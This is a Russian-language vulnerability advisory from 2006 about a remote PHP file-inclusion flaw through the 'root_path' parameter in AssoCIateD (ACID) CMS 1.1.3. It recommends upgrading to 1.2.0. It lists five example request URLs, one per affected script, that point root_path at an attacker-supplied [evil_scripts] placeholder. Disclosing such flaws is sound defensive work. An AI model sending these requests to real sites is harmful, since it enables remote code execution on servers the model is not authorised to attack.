PHP-инклюдинг в AssoCIateD

Дата публикации:	08.06.2006
Всего просмотров:	1293
Опасность:	Высокая
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:	Удаленная
Воздействие:	Компрометация системы
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	AssoCIateD 1.x
	Уязвимые версии: AssoCIateD 1.1.3, возможно другие версии. Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "root_path" в различных сценриях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример: http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts] http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts] http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts] http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts] http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts] URL производителя: herve.labas.free.fr/acid/en/index.php Решение: Установите последнюю версию (1.2.0) с сайта производителя.
Ссылки:	ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities

PHP-инклюдинг в AssoCIateD

Подпишитесь на email рассылку